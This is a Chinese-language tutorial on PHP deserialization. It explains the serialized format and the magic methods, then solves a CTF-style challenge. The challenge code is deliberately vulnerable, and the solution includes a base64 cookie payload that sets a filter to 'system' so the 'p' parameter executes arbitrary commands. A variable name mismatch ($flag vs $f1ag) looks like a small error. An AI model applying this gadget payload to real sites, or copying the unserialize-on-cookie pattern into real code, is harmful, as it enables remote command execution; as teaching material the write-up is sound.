原理介绍
php允许字符串和具体代码中类对象的转换,在转换过程中,会调用对应类对象的魔法函数,所以攻击者可以通过已有类的魔法函数写的功能突破限制,实现具体攻击。php反序列化实际上就是通过改变unserialize()函数的参数,构建利用链执行自己想要的代码的一种漏洞。
unserialize()函数可以接收的字符串格式如下:
O:5:"Start":1:{s:4:"name";s:5:"hello";}
其中各个字符的含义如下图:
实际上上面的字符串,对应的就是由下面代码而来的:
<?php
class Start{
public $name;
}
$start = new Start();
$start->name = "hello";
var_dump(serialize($start))
?>
需要关注的函数
__autoload // 如果出现了当前命名空间不存在的类时,会自动调用该函数,把那个类名当作参数传入该函数
__construct //当一个对象创建时被调用,new的时候调用
__destruct //当一个对象销毁时被调用,程序运行完调用
__toString//当一个对象被当作一个字符串使用,echo 对象调用 ,或者对象拼接字符串时触发
__sleep()//在对象被序列化之前运行,serialize的时候调用
__wakeup//在对象被反序列化之后被调用,unserialize的时候调用
__get //需要调用私有属性时自动调用,对象->xxx ,xxx变量不存在的时候调用
__invoke //当对象被当成函数使用时调用,对象() 调用
简单示例
题目代码如下:
<?php
# index.php
if (isset($_COOKIE['yyds'])) {
$flag= $_COOKIE['yyds'];
require 'class.php';
}
?>
<?php
# class.php
$f1ag = unserialize(base64_decode($f1ag));
if (isset($_GET['p'])) {
$p = $_GET['p'];
$f1ag->$p;
}
class F1agconfig
{
private $f1ag;
private $path;
public $filter;
public function __construct($f1ag = "")
{
$this->f1ag = $f1ag;
}
public function getConfig()
{
if ($this->f1ag == "") {
$f1ag = isset($_POST['F1agconfig']) ? $_POST['F1agconfig'] : "";
}
}
public function SetFilter($value)
{
if ($this->filter) {
foreach ($this->filter as $filter) {
$array = is_array($value) ? array_map($filter, $value) : call_user_func($filter, $value);
}
$this->filter = array();
} else {
return false;
}
return true;
}
public function __get($key)
{
$this->SetFilter($key);
die("");
}
}
解题思路:
利用F1agconfig类中的__get方法,调用SetFilter,再将$filter变量值设为一个php命令执行函数,从而实现任意命令执行。
<?php
class F1agconfig
{
public $filter=array("1"=>"system");
}
$a = new F1agconfig();
echo base64_encode(serialize($a));
将Cookie中的yyds设为
TzoxMDoiRjFhZ2NvbmZpZyI6MTp7czo2OiJmaWx0ZXIiO2E6MTp7aToxO3M6Njoic3lzdGVtIjt9fQ==
再设置参数p为想要执行的命令,即可触发容易执行漏洞。
